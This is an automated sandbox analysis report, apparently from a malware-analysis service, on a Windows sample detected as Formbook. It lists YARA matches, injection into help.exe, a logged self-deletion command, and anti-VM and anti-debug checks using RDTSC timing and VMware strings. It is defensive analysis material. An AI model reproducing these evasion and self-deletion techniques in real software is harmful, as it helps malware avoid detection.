          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@11/6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile created: C:\Users\user\AppData\Local\Temp\nse5FE8.tmpJump to behavior
          Source: 5t2CmTUhKc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5t2CmTUhKc.exeVirustotal: Detection: 28%
          Source: 5t2CmTUhKc.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\user\Desktop\5t2CmTUhKc.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeUnpacked PE file: 2.2.5t2CmTUhKc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_73612F60 push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041624A pushad ; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0040B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B2D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041624A pushad ; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B41B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041624A pushad ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B47C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B412 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041B41B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0040B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile created: C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Windows\SysWOW64\help.exe TID: 6520Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
